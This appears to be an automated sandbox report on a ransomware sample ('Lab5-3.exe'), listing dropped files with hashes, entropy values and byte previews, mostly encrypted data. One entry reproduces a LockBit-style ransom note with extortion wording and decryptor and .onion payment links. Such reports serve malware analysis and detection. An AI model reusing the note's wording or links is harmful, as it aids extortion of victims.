                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):469758
                                                                                                          Entropy (8bit):7.349622022506835
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:R/j6xAbERc5vkfEg1P5XIgKBerZyfgydinJEqqO7XiQc8JmmOQxUq+Ye7nJ82/a4:R/+xAv5vg/1Ppw37V
                                                                                                          MD5:28226CB7E5834883648F1221654C1A8A
                                                                                                          SHA1:141B1C57B6CFCD42BADBFC93993CB94789264C22
                                                                                                          SHA-256:359D631F7B400F7202C3C3D939B0F1B9158090E883EC114E73EC7D17CC686F91
                                                                                                          SHA-512:3F077DB805A556229577BD4D6BB6A0435B1FC2DB600CBA01B5BBDDDB413CE5F4AA73B3F76B115A59140BD3BFF274BC4232A69C5B6B1D16F1DA610A359D0E4931
                                                                                                          Malicious:false
                                                                                                          Preview:...^.U..H.{d..z..t....T..^......@..@.dP........F..U..$..s...a.g..........a.5.n...r..6....(f.'B.\...;V...^....f1.(..J1`3.tx.H<.e.%%O..A.e..(...a....X.R.3].o.R.|.K_.j....X..z..wD..)8,\g......4...3$j..."..eL.............~yIVf..........X..SF#.wdr.....l...,<..%[Q....a.U.R...............|MW.H=esl.U..s.}X....'.4c.Uy.(.s.......0`@.z.t+..]?{......r.....f.L.]......wY.#..L..k.6V'.E.&...&P....,..T.>....I....!x...b........P...s..d..jIHo@ckx]0#....%.....EHh.l.K....M!.....XC.AK.V]......-........J.b*..c..\.0....Y.c....p+.Q.YZ[.#.tH-x..m6t....gJ.. ...U..%....B..pn..C...M.s.Ii$..rS....&?....$.o..pS0..-.W..]...b............xb.E.5../....-....#\0.)...6H.7w.v..8.......r.V.....:.....~..Y..z..S.\!..!J'...yG...j.iv..]*..W..WjO|.\.T.....O;Y{.Q.^U...R'..*.e.w`Y.01S...=..aU....f...s.?.=.P....s.....7(..N8T{..A..A._......1.%.c.p....4 ..l.../..1.....]f..n...e..}|P..8&.9p...M3.S.u.#.~(..k.....?i...;82...n...p....i..u?f..B..;J....NOt..X.]?...M...R...X..g.9%.?.u....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):614060
                                                                                                          Entropy (8bit):7.998070966253481
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:12288:zkZWmYfTCCuVGhAXVrku0Z54Tp+vwQn8oSZYWAlFQQ3WYcwDZsR4qH:OnC5KXVrkui4JoSZQjtcwDZsCI
                                                                                                          MD5:071AF847B35EAFA9EEDEF1A0AE532BBA
                                                                                                          SHA1:48EA0AF1B125B0EFD832055A4FFE6249F5FBC3CF
                                                                                                          SHA-256:C2687C2F5C83C3CC838E064F78BD70EECA8430272D56C0801FACBB7D8A398730
                                                                                                          SHA-512:37C1627A677BED71AC02B0711195E7C6B1571F2940674CD50149E0D325799E05F578CDCDD797A60062A07C22C07C52C83CFDB25D993D6D514ECDE52A46C736C9
                                                                                                          Malicious:true
                                                                                                          Preview:....Qgk..(...Wr*.;n.Un.s.3..U..#.[.72.h..NS.L^-../.....z...V...q.t..Z.J......o6..U.........* @`]..b?.MYvLQ..c.>.Fr..g.$.\.V~yL.al/4.}.B...'.,.7....O...r.O...^..93....K.S.#$.F..m...cS(.x.{C./..hv6......X.l.....L?...Z*ZO..B..~......l..V...#G......UA.%(..U..O.W..q...kz..'.&...x.].H.%....(.4........D.9.be..[-..7..&.....t.=.....A...<..J.....~$@....d.&..n.bg.._.w.S..8.v....i... w.n..).!..i<...x@n.4..._..5......"q....Z...<r4.NOS.......n?m.F.au..F...48..........@..8Y.+b...L....W...f...6.AP#....t.,Z...`P.....S...S2B..H.^.L....?.F.\+.k.Ep&....X..`.`.f.9.b...7..&.#f.......LJ...z..i..D".Fr.[.......2..keLV.N....+.hC..V5.Y.:Qri.KW#.p:"..bQ.'@....(*.aOC..<...QTS..l........M*.S..X.Q..53.3..........s.u..'E`....u.-$V...]..0...)t..AE..).UO.-J........u_.Cv..OQQ2(Z97.u.....KS.R.;...[P...2....,_....<W.5.\."ce.8.Nw..D...-.f,.Z.../..|..U..0X.......IC....-.....;"7q.Is^..u..6..xT..L.J.|.0......."a.a..x.FD.....)'...[..l.u..z.B(.x.U.a.#j....7.t..E!.....z.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1826370
                                                                                                          Entropy (8bit):7.9130248648477375
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:U6tQ7jAE3B3XaTDMY0av0BFBD2GrO2GrLo62ovD1cmr:U6tQRIk3av05DrrOrrrb
                                                                                                          MD5:14B62184F3E3F329F2F9053D3150A780
                                                                                                          SHA1:ADC6CBB91C37F073D1BC5692FC3CE9950DCCE732
                                                                                                          SHA-256:B005F15E7C89954A8160848CA0820D79CB24EAB875D2C269BC536A45B77657F1
                                                                                                          SHA-512:E471451D1C52051ADF7971BD1CAF7B856FBF9DB1703832DB2B30E966EB237A664C0A0FAFDB7C45121EB37C8826B9A1C1B729F548E17504EB39136EC61584E644
                                                                                                          Malicious:false
                                                                                                          Preview:..........).b.....E.v...>.c...+u.J!.i./.;........y...X..W. ....q5O..pe..i.l....@....sOj.5O...P^Yg..F..$....r....T.b..`U.m1..w.. \?.....|(..... i=.(..@.:V.3..+..6.V..u.|.6..qV..o{.l@...../G......<.o.).._.P..[..A...#-c.k.btGD.K..... .(...B.....o.Z.9sBJ1OV.R....b.`/...........Y)'1....S...#.k..~;k.(...^D.+.....?.=..v.I@.]y...&.....Y(3...o..c.p'f....Oe.+4......t.2Yv..C/..6..2;...B.I1p+CX.."..Q..|O...U.jf.(.........3....[..E....$.xag...5`.7R.H...p....y....FA.H...cjO....%.#.N.8FA....=.."...r(e....F.z*.6."F..../.....k.7.".@.r..0HP...{..I".5)..W.+\.q....r&...i.2.......06..dWU.1....&.y(.F+UX+...Y...{.......J...@..=A..rD..]..T......Sl..q.c......Z...t.X....T.B.|.ru.#C}e.v...........ge.A.v..BR.Tm!2..,.mS.\..2.n...).g.^.....Z..^...j...2.{.Grf...\..#.*KW...0|C...E..a..g.S=..\.|*z#....s.8I..q....kh....'+........n4.g....L..6...V{..C./9,.c..1........(!..v..[h......t..c.+..4..o.2...)[...O.cS.N..Zc.....!..,..\....I#...g.'..?...V...31..~m9...Z....j...:.@
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2656
                                                                                                          Entropy (8bit):7.937874260985895
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:18/ns+MG/DhM+FLrwx5qhDfMl7rjHfUTid3hBaUoSGFcmeykEdEElU92i:18/r/tNc+hD0lnwGx0uKeY2ElUJ
                                                                                                          MD5:A9060F327E37CF19AD3ACDF1937DF5FE
                                                                                                          SHA1:DA005486124D6178D1F78DCA7C36BE4FD4615BE1
                                                                                                          SHA-256:EE569519157D548A6A6974AF89224911E60F78DD4A92E0A27992DA33F17596B4
                                                                                                          SHA-512:7554EC9A0D97689943DD1EDE6390655C7B1A2D37A570DED54CA5F26C416ED074C00D5DAD21C6F564D8F1EF1549093D252EC51F524AB5A63A73FCD8DD0A88D7C2
                                                                                                          Malicious:false
                                                                                                          Preview:...%.......]d..>e.1*....W.....Mh...a...F....r9.E"R..DW.J@.|..-......T.......G....1,.....A.E3D.X.v.z@$...x.>-3..T3.a.'W..iO7....b.t.5.W...1F...J.........9O.......1.)#.r..M....n..\.]K...V ..k..@.:\....G ...Jm-.h.....H.[l.0...*..m.[..b.(&..A.'.t[|..H....CI....r..Vp.u......e...c.......>......=.....Z.....A.......'67.'.9f#..\.U">V.1./......(..'G.k.}.[A...w.3.."?..'..y@.7..}.&&...5.T.r...9..K.+..../..Vc*.*......F.2fpr.I.i....s.`.r....R..K.. ./...f3.?.D[.d.|....'..].i.|....mY....e...y..qj.X.f..C..4V$ga..O....c.35#U....c.).,XqzH.K..k..H.%.n.'.x..m..\.........C..\...&J..Q...I.I.^....=..<j.)..Vg.n....s1h..$../..#..U...i..,....L..?..*...W....\..Z&0...+'....7..o|n...-...e.W.t!g..es\..2}..z....*Qu`......RgPF.9iC...m`..A3......0..b&.p.\[...5.......JcY.@.!...y..am.....-....@.zor.......L.....M..gS.,.H{....*^...%.MD9.j..]C|.....:....z.Y.N.D.....a._.........e<^w..]s.!C.SR.<. ;.....0]......Y.._.......L.3.j...d.......?..OG... ..C..R,......Iqtu,.|yk..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2544
                                                                                                          Entropy (8bit):7.92565975498329
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:S/C6+DW/myE85w051CRYHfUTid3hBaUoSGFcmeykEdEElU92i:S6SJEowYCGx0uKeY2ElUJ
                                                                                                          MD5:76D42F26F1F46EAC1F159DD4A5FE5647
                                                                                                          SHA1:F90320266F72F68B56F86A0F370BCE9F1327B700
                                                                                                          SHA-256:8B3C4A0E7C59F01DDDC5E4F982D3E0A1C2AB88143B98D46AA205258BCB1A5D42
                                                                                                          SHA-512:4BD23E6073F865202D880DCCC5E2713F8236C2CE6F2599FA5111A4B03F76AAB73A73522C6C2711C3753320974877F2F5A31103797FAA681CAC9C3F548CC0F7F4
                                                                                                          Malicious:false
                                                                                                          Preview:.....L....`..>^..n..$j.%..N.4...Y]...N....~.9Q.z.E:.w1...P.....R.am.x.X. .r....T.U..T..2....I.D.yo.\..=M.oV.&1V.]7v.^..=_.k.8.....}.2...{.;.w..tC.|P.w.B.".J.l...b>...:..p}.)7.l.....Z.9..@.0i4.Q.!.N3R.%jM?..r...!.*..\!.D..s..m{.....W,p..o.R.......$...s...#.....v..cudy..>'..4..6........k? ..m.......&..P..u......3..D..b...P.z........LT..60.f.....^..\.Dr.....A...o....Wk...dG...-.M..U.?..b.E.dk.f.I8.....T.......D./Q.V.................Z/....C\n #........l....Zq...](.h^.\v.*...S...$Zh_O.....ci".,.2{|...9...IE.6..t.ay..V.T.*......9.9x..Y..u.f....r.Z..EL{.........K,L.K...w.bpA..U>..Rq}.....I;..V.B...\....".M.G.T...Rx/P<..^*\S.M...:x.SWAaNc....J.-D.s.Q.9.c.e...Y...\.66(..sKM.b.NJ....IB.bc7.T.P.b....z.Q.t..W...LY^i..g..!;..8..@:<...qL.5....H....a,..`@...]....1.4.6..H]@.4..3'.m$.....%r.Y<+.h..,....h.....W....a...TD.E.'...B]:Ug.M...Pq ..<......[n%.A..6...../..@Q.....ln...*.&.h&.....<......^....<s.x._..&+..f..<?......)..y6D...l...f.=5D..<...}.uc.......z..O`..~.y.=.V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2288
                                                                                                          Entropy (8bit):7.918558284806648
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:x0+WgY6P75Tholl1/J8HfUTid3hBaUoSGFcmeykEdEElU92i:7Wg9j5KllNJ7Gx0uKeY2ElUJ
                                                                                                          MD5:0BDF1EAF0BBA61D28E8F33C04F8B30BB
                                                                                                          SHA1:A154866DEF61988F68B91D4737BF126348E3B7D6
                                                                                                          SHA-256:1D9EC2A4A385EB83A5D0189CBE20B6BD6E02EB9E8EE4C99F37DED12F6BF29F16
                                                                                                          SHA-512:461803AB1C8BEE60DC7ACAACACDB4A8AB1AEC6D12E205EE98DF11448BB3ACDAAFAFD8B345245AC3CF0E005610FA2D1AA856B8DB9C46C8ED0D06581074C91B465
                                                                                                          Malicious:false
                                                                                                          Preview:0t/l...@.T.......}..2..{.t."X+{.o.V..!..\.Q.Yw.f..O.o......4..)..4..Bz.I.8......l.IO...i.giH.p]..A.uz..R.@..Wo...`M.z.T..JO.\7.......}.7z.L.4........m...k..T$.v_x..~...4>av.}...-.z...&E......*...o..rs$...H.g..,..e.w..e,.).4y,...*h.G..].,~.:h..1P.O..u..5.;:...^.p.P.D.&$..c!.\8....q....PT1..`........7..<.U...?......(.....v..F3.0.x..._..tq~...)B.,.......,....... Z..7...c4..,..X."...`.....R.<.GF...v....u\.....qM?yj....D_...O....JC}.....6a.H.LCM-..dN..J...n..0h.Z.`.F.../..Jc-Nw..7.N`..`n......D.t00....HP...~{..c.I.6.HJB...?.n...V".Mr.m..j..4.^.&z...S.3..;.J.!..F.ZU.r.#!.....Y....}.....O..O..R. ]...-..u..*P....8..6.D.?..=|..J....2.G3..^._c......s....8..2.Pg.....f.V.....9 .......r+..n....?..`...1o;......1x....X.\.2T.._........d|.S......rPlI_=T'....X...@...,Q..BY.....k.I...a...<I...#.........m."..+.{.0cV.+s.........(.'.#2....uU.R"(..c.....rG.B3..2m1.cnD.c.k..........ux.W.....#..6@.=..l.1.?g~7Z..N.]b..@./.}..0.r..iu:z..d..Zb.........y.._..^.Q.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2048
                                                                                                          Entropy (8bit):7.916669047497905
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:g84GuRinqh1A9HHfUTid3hBaUoSGFcmeykEdEElU92i:v4V4nW69sGx0uKeY2ElUJ
                                                                                                          MD5:8F0B68F1375F2BC59621E1D7B0F05C6E
                                                                                                          SHA1:338BF85FD7A18332EC30D1DEE5C27EE16AF8F748
                                                                                                          SHA-256:1F53044402DF3552CFD18EFB443B35CBBABB858B13789CCAB3683E32830DF107
                                                                                                          SHA-512:55FA1F0FDC7C2401433A8339C4727BE5919E99DFE0C3566CBFAD1AB18F719F18426946A30BD34F5D1952BCBF7A913AA1598D74CC371E5567CD176C13092C32BF
                                                                                                          Malicious:false
                                                                                                          Preview:..f8....hQ......]ZEk.{.w.#...U.i..X./i..*.v..y.<8....4.o?..`.......L.mm.....|..o........Z..6...=.hzo!..E.....J..@..M.<...EN.}/.1....K..b.Q......A......4..ezTw1....YZ...H.Q...^.. .s."U."Y....?.?.G_e3..9.[<......."I..Q)K...x.......Rw<.5..c.R..{..fB..;n_.07X..C.....]..^.<.G.X..K(.)>.I.....#.gBk'>.P..t.=q/.{eB..l..CD_.sQ4.pgZnI.....#e^O.A.<...<.`....4..VdD...u.OD....3B....w..FB..HU{.f........%.~..T....'.0.|E.ka.].E.@K.%6......bG.p $.ae....|q..G...8B....a.........R....kO.t...7.ms.#r.i(.........6$.....O..Q$..rVE,u.*,/....c.. e..xv....P|p...R8......,7U.~.....j:>$3..k...U.n...*>..+.. . ..t.2.W.v....O.....l....+(.......3=3.e..8..(.R<@..DR|..W..<Qd+b$&.i@T..T.s/.Y{...G.s6E.D.......h....w.%..A.y.)........:x*....X.{.2..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1920
                                                                                                          Entropy (8bit):7.903092363875188
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:PFZQkmTilI0yYCBSHfUTid3hBaUoSGFcmeykEdEElU92i:r7mTil0zGx0uKeY2ElUJ
                                                                                                          MD5:0E339ABB52E3134B0AB097B9DD8D329C
                                                                                                          SHA1:EBEB6D7808FCF33188346CCFC85E384F4DC1AE70
                                                                                                          SHA-256:B8F8867BC64B6DBDCE05954F75054B88976C3BBE5D722475F69A4AF7DF8697D6
                                                                                                          SHA-512:19E140AEC9890E2858728B55FB35BEE7EABD7AB0E7332540888305452D7B1F3592A72E7FEF3F0D13EAEDBE896EDBD773AB5970975888F7F1B298539BC7EDB52B
                                                                                                          Malicious:false
                                                                                                          Preview:`...+tC..#LIR.t.UZ.\q.s....9.=s....7..?a.".^L.......,....H......!|.v+#..v,...&.e.....P..;M......r0A.R.....X...;L..,..J..Y...M..Kq>....l...B.V.tk.a..z..................@)XB7..X.*x......3B...L..>.x...gg.KR@........[..)..8m.....;7..Y. G..$e.YOW W$.......=..G.EE8..J.MM8t ..;.....f.C.GM.4$....S&.....x.+B.A#5.%O...8...\.x......tS;..,.+....&..h.>].;..... ^.a....H..d..#........'...G..F.........Y.'.\......f.A...$I.-.f..$....E.H.qX.]...a../z[...t.V<.C..Ip.5n.r...'3h.C|>.+i..iJg(..h.".%....j#M..0'.>N... Sg...C.....S'.....B..4*.mmYB..._....s.Gj.....o..L..-..Y.`..b.....4..l.0U..s.x4...t#v&D...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2256
                                                                                                          Entropy (8bit):7.924007659289063
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:uqMDUaE1r86yRCNbcHfUTid3hBaUoSGFcmeykEdEElU92i:Jawri6/Gx0uKeY2ElUJ
                                                                                                          MD5:9D330C0F7F3F8B8B0370C513307757C3
                                                                                                          SHA1:AAD6E8744075EF69DCE66E67DB8DF5A7C603FF31
                                                                                                          SHA-256:695DA7F0693CD9C9FA27986E7FF42233832042016258022164C859E18C4940B7
                                                                                                          SHA-512:42CE2C0E772BA8484C77D9CEFCCF053E813BBA9F5FEB5D52330B4AB933DAC45A8F1D72CBF280A948DA3C7DA5F5D45825F2DDFAF7C2DAE69296D7120B539AF116
                                                                                                          Malicious:false
                                                                                                          Preview:M.5.}<.1u...W..^.Pj^.o.3.D...d....^.E`.).ypI.....<<.W.l.\..i..V,.j.4......T5&....K.ySq....tK.z.Uh{.u..L.p.~C ..x'..(.2;.J8.l...x,....q..04.A@.{.........l.....W....T.R..5.{Q.l....U...g..zR.Z..5m...........#G..mw.|m..\.HF1_..........7,.......p..M..xb/h+qR..9s2.s.}R\....q...9...G......i.j....xB1.G......-y....S......N......Q..D..3}/j.r..S(...$.xu.%:.:v.+...Si.>..q...uA[.g6.<..R.Z.o.8].LK6.,Q......V...D.0.q...o9./#w;6..?...F....r...ySzg...........56,.Yr...#[Y..._E@..u.\...p..v.....+.y`..".e.4..c..'.{.up....dQ.^.'.|b. ..t".Br...j..55....@\!.|b.>K..`<..gz'=d...sj.6.....m.&DW5q.-.4......_.F.j..].......(...*.{..}E..eB.'#._.....Q.!.C.. ..hEK2...0...{..v+.p...Q.1.[...M....q+2.5.i z..e.6..lqa.......wh......\....@..0....0...as..4Gb.p.....3...Sg..$S&.<s.z.TA^....{..mF?.l..-.s.uA.....y.....\.......3..K#..K.Y<...Ji.8/.....D...6...&..Y.t.rwxcW....)qI!..lh..gPf.$.7..9..{ .W....I.{...X.3cd....A.s.ZB...n.n...p.....T..^.Q...rp....;....M....R...=(..(ch
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2144
                                                                                                          Entropy (8bit):7.9165512339367625
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:EFD2bKSI2CGgBIg9HfUTid3hBaUoSGFcmeykEdEElU92i:Ex2bKSlBa9WGx0uKeY2ElUJ
                                                                                                          MD5:D86A69AE298069212EB7446684C0ED84
                                                                                                          SHA1:F04F290F1576FBD5EEF8C65200D53F33D58AD8B1
                                                                                                          SHA-256:DD2CDAB9360B04AB32AA08C4F915782856BF91192BCC5721EE58ADD7C2D7A48F
                                                                                                          SHA-512:F42CF1D6AF05CAAEFB05CA8AB0DB100521ED62E3EF6B13682714F580C7FF2A8617BBD5E6AC8F6D011B508BC63C3FFADDFAF40EE55CAE1A35A25D12DFE1A6EC01
                                                                                                          Malicious:false
                                                                                                          Preview:...l.....T.e.i%..Oy..s..}....[.....S...W.P......N.!.Z.q..8c@m...e.I.U0.u.PC !...D.).,4..P.2.q.|M...O....z.d..d98..7..ue...?...W.....5..l.:.......!..c.Ssjm.f8Z...F..o.C.\S...W.F...~L!x.,.L.G..D.r.....|..N.J.....f.+3E"..@.+...c:.KnZ.....C.VD.[..rZ.'G:.aF4.L$.7,h.S.T....l.....kW~...,W.d.F....{.C.Z@...uF]Gk...H.......jt..(..]...%..Q...FV..{...bI.zyA....!u|..sn.:Yl......N.7|P..wK.....J4^.,.Q......MQY.._.P...7'......."W...5...T.S...*.0DR..BY.8...G.j....f.*..+..yu...._]...4..Q.+)*b..S.7.&.r@..)..M...5o.#.Q.Q..M.z1...O>.T.d..i..t.:....|.*.@v.[ .p....!..'..=W..7.*$.Awm...!..5..{..P.....;....4..nK.V......U.W..c`|.n..8.Hg.9y\...{,.~C...V%?...G..T5..,.R...u..y.af.r..@5....(.D.~.7.....S....{&...5..u..~............Y..L..}S%......]...%.."..]a.r..e..r.*71....B/.}..M;8_........p|..w4i8.......C5....{.w..mf.Pz..*.....5.l.{..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2384
                                                                                                          Entropy (8bit):7.921204914082638
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:o4jNC0IdqyrkEtcfFBxLF0ajHfUTid3hBaUoSGFcmeykEdEElU92i:o2IdACawGx0uKeY2ElUJ
                                                                                                          MD5:713A19FF8021C283A2572BF94F802665
                                                                                                          SHA1:179E4ED895D93A7D6A6967E2A3E86A6D90DC8CA2
                                                                                                          SHA-256:F7D1E68A978C45FFD7469D9E04FB06C85AD1793789DB85B28B4CB0880023D5B4
                                                                                                          SHA-512:AB614088080E750CDFF1B65C38C98E6B40E2FF7B5694F80661CC176B7F01C3FD70EC8B03F75576020E1B39ECD3FBF598500AB02055142D23DE9D3FAECA09E8B6
                                                                                                          Malicious:false
                                                                                                          Preview:K..:.lcq.?:..[g.k...]|....l..k...;j!/....B....8+.T..Bbp..C.yu.....d#.........[.`..PI.......`..#..y..B.1#....|...E.+.....?.......[.h{...!.;..i.E... x_@..O..Yb^..]#.....<..}...d!....M...53..gA.Io.(...7..U.....]..!.......D:.G....{.....rq...K...d........=..s.....|.j`=..9.\.3....~.B.2v...a<.....<.#NYI.@.X+E&;B.....w...P..=...f....`..>....%[.c#...z.p.7..H.{@ ..$..H.h..Y5..L..9A.N.oP...z....`.z...;...l... V.......M<..F.5..........S=.@..&..@z..Y.jEbAh.l..%..sAg=g@.....Y............vt.:..?[..9.{D..v.%.2ld]..Sl..?.73e;.E...".2......j.+.T...F...R2.1.a..E....7...4..=..s...d.........(.fM.tQiMV~....V..,:....#$..bnF.:T~.R...b I....=*.....>-&W=q]...F'f....Q%$6.<......"...{.^...(...7.K.L..=..@.......~..4.....Nx,ZoW{.e.....7.,.Ad.4.I.....>)......v...I....3X..........c...I..;M....\....Z..`..;.c..u.6WW.....gyW..6.7._..Tr.0..|H.F..wL.g.t.vKG:.}..MxQ..ue....9..s7.Pu.k..`..J..G..{..j.e`!.i.En.&P..m...4....~.....^;.....3.....yY...-.?.H.o'.....}3.0.<.%.lbPv~~..u..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2480
                                                                                                          Entropy (8bit):7.925701391149421
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ezDKLlNP9g9CRvsCO2boc4XfSHfUTid3hBaUoSGFcmeykEdEElU92i:n7+mvsC5boc01Gx0uKeY2ElUJ
                                                                                                          MD5:C81E53D8EA5F4547757079A06F496C2F
                                                                                                          SHA1:D52C9325F9E42DA824D7D7401D4538E913C4EAB2
                                                                                                          SHA-256:E5DA1B45EAD384D8517792392905DA6A9B643DCD2CFC9D7B360C4E0CCB6D5141
                                                                                                          SHA-512:0421775C2C403C9A42CD6564628EA8E032E4CDC41985A4BBC73BBAF593BAFB90EB0682E1DD0A142306145B8922DEE400447EE20A8F98F85622057708EEC20FC8
                                                                                                          Malicious:false
                                                                                                          Preview:..0_....9. ....OQ...9".;#..>.....Mw..........n.1.;....$..hy.M.......W/.J..L.SM..s.i....Z).Z.7....msb.V...}Y....TGA=0.p..:.c.......d.V.8...|..+..=..T.GN.{..I4.1..].=.|..N.%.... .0..3C-.m.b......R...;.......L.Y1.O6dg....%p!.,....\.?>....M..r..G...sS..5..g...,..2..mZ%2.,..:p.......O..6........ODl..z..,..l.i.$=.y....H...7.V3.'......t4!.N..../..;.-...<katr9...Ej.g=.$...ko.x.vRv^..[?.P.F(....L.G[.Qq9...RJ0.@TJ0h....e.(.q....!.w.9..@...sv.....R...*6.H"..|.....>dR..U8.......T.....$`.Mf....$#..x..>.1O.,S.4.V..o..u..Ql3.yu.....5.Ft.gK.......T.....D....R80............kJ....7p^....\.......Q.......a.....xj?.3z......H....1.O......Vk&.q...P....SY....%.....|=..A(.+..\..<.......l...zmZ~...oM..1=...../G.S..[3Vw..8.0..*...IP..;..b..su.....y...;.7i...!{.x..?.....(...(3.8.l...I.).:\.@.L$./...E..?..3... `.|w.....Qt.GR...T'....Q.;.y...M.....C..Y/.S1.J..n....K...'Dkb...p^.UJ.w.0..!.mJ.......IA....mk.....A..U*r.l@.....s`.....k..x...Nu\%.}.lNso...dV<.7-h7.....,.i6<
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3616
                                                                                                          Entropy (8bit):7.95955293391721
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:yG8fMX2iAiGSqPNGRaZT603xXlYVAporPWHM6HfUTid3hBaUoSGFcmeykEdEElUJ:yGt2iAp0sm6XlZ+ZGx0uKeY2ElUJ
                                                                                                          MD5:A4744817446E93D59C25BD00660CD1AB
                                                                                                          SHA1:ACE562DC018DA01B715E6FFDF75453F8C67B02CC
                                                                                                          SHA-256:AB80CFB4A9996B2BB1915E29555DAF6B209448141747537AE35D3F2838BBD69C
                                                                                                          SHA-512:DB2A2138ADD0520777F3D196F0D92FB534D675595054EAEE3DACC715E72BEDCF65D4CAD88DD4FF8C28167CBD0FC952AE4D7A866646DB19DB296DF61CDEA106EE
                                                                                                          Malicious:false
